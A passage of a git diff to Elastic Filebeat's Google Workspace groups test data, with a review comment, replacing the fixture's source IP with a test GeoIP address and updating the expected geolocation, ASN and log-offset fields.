+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
index 48cbd47cf05c..8db5f00f389a 100644
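Review bot: The fixture's `ipAddress` value changes on every record from 98.235.162.24 to 67.43.156.13, and the removed expected-output lines show the old address resolved to a named residential ISP (`"source.as.organization.name": "Comcast Cable Communications, LLC"`) with city- and region-level geolocation, which is the kind of real-world identifier sample logs should not carry. The new expected output resolves the replacement to AS 35908 / BT with only continent, country and a coarse location, which suggests an address range served by the test GeoIP database rather than a live lookup, though the database itself is not visible here. Consider recording in the module's test documentation which address ranges fixtures should use, so later edits do not reintroduce a live address and silently change the `source.geo.*`, `source.as.*` and `log.offset` expectations that this commit has to touch in the companion expected-output file.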
--- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -34,23 +34,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -71,7 +67,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -87,26 +83,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 559,
+ "log.offset": 558,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -127,7 +119,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -144,27 +136,23 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 946,
+ "log.offset": 944,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -190,7 +178,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -206,26 +194,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 1385,
+ "log.offset": 1382,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -246,7 +230,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "group",
@@ -262,26 +246,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 1759,
+ "log.offset": 1755,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -303,7 +283,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "change",
@@ -321,26 +301,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 2144,
+ "log.offset": 2139,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -361,7 +337,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "creation",
@@ -376,26 +352,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 2665,
+ "log.offset": 2659,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -416,7 +388,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
 "event.provider": "groups",
 "event.type": [
 "deletion",
@@ -431,26 +403,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 3047,
+ "log.offset": 3040,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -472,7 +440,7 @@
 "event.dataset": "google_workspace.groups",
 "event.id": "1",
 "event.module": "google_workspace",
